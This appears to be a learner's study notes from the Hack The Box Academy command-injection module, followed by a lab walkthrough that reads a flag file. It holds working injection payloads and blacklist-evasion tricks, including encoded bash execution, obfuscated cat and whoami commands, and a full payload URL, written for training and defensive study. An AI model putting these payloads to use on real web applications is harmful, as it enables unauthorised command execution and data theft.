Hack The Box Academy - Command Injections

Time to complete: ~4 hours

https://academy.hackthebox.com/achievement/402127/109

PayloadsAllTheThings command injection reference

Command escape characters

All of these operators (except the semi-colon for Windows command Line) can be used regardless of the web application language, framework, or back-end server!

Bypassing blacklisted characters

Space character

Linux

%09 # TAB
 
${IFS} # a variable whose default value is a space and a tab
 
{ls,-la} # Bash bracket expansion, which automatically adds spaces between arguments wrapped between braces

Others given in the PayloadsAllTheThings guide.

Using environment variables

Linux

Print all environment variables using printenv.

# Takes the first character of the PATH/PWD/HOME variable, which is often a forward slash
 
${PATH:0:1} # Forward slash (/)
${PWD:0:1} # Forward slash (/)
${HOME:0:1} # Forward slash (/)
 
# Takes the 10th character from the LS_COLORS variable, which is often a semi-colon
 
${LS_COLORS:10:1} # Semi-colon (;)

Windows

Print all environment variables using Get-ChildItem Env:.

# %HOMEPATH% -> \Users\htb-student
# Output character at 6th starting position and ending at 11th from end
 
%HOMEPATH:~6,-11% # Black slash (\) - DOS
$env:HOMEPATH[0] # Black slash (\) - PowerShell

Example (Hack The Box Academy)

The payload:

127.0.0.1%09%0a{ls,-la,${PATH:0:1}home}

Which is interpreted as:

127.0.0.1
 ls -la /home

Because %09 is interpreted as a new-line character, which allows us to inject a new OS command, %0a is a space, which is necessary for the second command to be recognised, {ls,-la} is interpreted as ls -la which allows us to bypass the block on the space character, and ${PATH:0:1} is interpreted as / because / is the first character of the victim’s PATH variable.

ASCII shifting

First, find the character in the ASCII table that is just before our desired character, then add it instead of [ in the below example.

Linux

man ascii     # \ is on 92, before it is [ on 91
$(tr '!-}' '"-~'<<<[) # this will give us \

Bypassing blacklisted commands

Character insertions

Quotes

# Cannot mix types of quotes and we must have an even number of them
 
w'h'o'am'i -> whoami
w"h"o"am"i -> whoami

Example (Hack The Box Academy)

127.0.0.1%0aw'h'o'am'i

Linux only

# Bash will ignore certain characters, including `\` and `$@`
 
who$@ami -> whoami
w\ho\am\i -> whoami

Example (Hack The Box Academy)

Payload:

127.0.0.1%0a%09{c$@at,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt}

Which gets interpreted as:

127.0.0.1
 cat /home/1nj3c70r/flag.txt

Normally the cat command is blacklisted, so using it returns an Invalid command response. But, by obsfucating the cat command, the input is accepted and we can chain previous character bypasses to read a file on the victim (flag.txt).

Windows only

# There are also some Windows-only characters which can be inserted in the middle of a command and do not affect the result, like the carat `^` character
 
who^ami -> whoami

Case manipulation

Linux

# Linux commands are case sensitive, so we need to find a way of turning a mixed-case or upper-case command into its lower-case variant
 
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") # replace all upper case characters with lower case characters
 
$(a="WhOaMi";printf %s "${a,,}") # same affect, and without a newline character at the end
$

Windows

# Windows commands are case-insensitive, so it might work to change the case of some/all of the characters in the command
 
WhOaMi

Reversed commands

Linux

echo 'whoami' | rev # get the reversed string
 
$(rev<<<'imaohw') # execute the reversed string

Windows

"whoami"[-1..-20] -join '' # get the reversed string
 
iex "$('imaohw'[-1..-20] -join '')" # execute the reversed string

Encoded commands

Linux

# encode the command
echo -n 'cat /etc/passwd | grep 33' | base64
 
# decode the command
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw=) # option 1
bash -c "$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw=)" # option 2

Windows

# Encode the command
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # on Windows
echo -n whoami | iconv -f utf-8 -t utf-16le | base64 # on Linux 
 
# Decode then execute the encoded command
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Example (Hack The Box Academy)

The malicious POST payload:

ip=127.0.0.1%0a%09bash%09-c%09"$(base64%09-d%09<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)"

Which decodes to:

ip=127.0.0.1
 bash -c "$(base64 -d <<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)"

ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE= is base64 encoded for find /usr/share/ | grep root | grep mysql | tail -n 1. This encoded string gets passed to the base64 -d command (<<<), and then the decoded string is executed by bash (bash -c "$(...)"). The injection is afforded via the %0a new-line character followed by the %09 space character.

Alternative commands

• base64 | openssl
• bash | sh

Auto-evasion tools

Bashfuscator (Linux)

Setup

git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools\==65
python3 setup.py install --user
 
cd ./bashfuscator/bin/

Use

./bashfuscator -c 'cat /etc/passwd' # randomly pick an obsfucation technique (which could pick a technique that results in an output of over a million characters...)
 
# -s 1 (number of encoding stages)
# -t 1 (technique level - 1 is basic)
# --no-mangling (do not rename variables randomly / preserve readability)
# --layers 1 (apply 1 obsfucation layer)
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
 
# Stages = encoding the message multiple times (eg encode 3 times in base64)
# Layers = hiding the message inside multiple envelopes (eg a script inside a script etc)

DOSfunscation (Windows)

Setup

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation

Use

Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

Skills Assessment

Task: What is the content of /flag.txt?

Authenticate into the H3K Tiny File Manager (credentials provided)

Find an RCE exploit for Tiny File Manager v2.4.6 - but it requires Admin access

Find the version of the web app:

Search searchsploit for an exploit:

Find an exploit on exploit-db:

The exploit appears to require Admin access because (1) it asks for an admin login:

And (2) it appears to require upload functionality, which I can’t see the guest user as having:

None the accessible documents appear to have useful content

They all either contain this:

And the last one contains this:

Find a potential command injection point ( ?to=)

One of the options available is Copy:

Selecting this, I can move a file between locations:

This operation appears to be submitted via a GET request, where to= and from= parameters are used to set relative locations:

It’s possible this GET command is being interpreted like:

mv location_a location_b where location A and B are set by the parameters in the GET request. It might be possible to escape the mv command by doing something like mv ;<malicious command>. To do this, the location_a parameter would need to be set to something like ; whoami.

Changing the to= parameter to ;whoami causes a non-standard response, which suggests I’m on the right track:

Get command injection

This time I tried injecting the id command, but obfucating the command a little by inserting single quotes. This worked:

Get /flag.txt

After some trial and error, I found a working payload to read the contents of /flag.txt:

http://94.237.51.163:40913/index.php?to=%3Bc%27a%27t${IFS}${PATH:0:1}flag.txt&from=605311066.txt&finish=1&move=1

The blacklisted characters/commands, and the bypasses I used were:

• (space) character 0 → ${IFS}
• cat command → c'a't
• / character → ${PATH:0:1}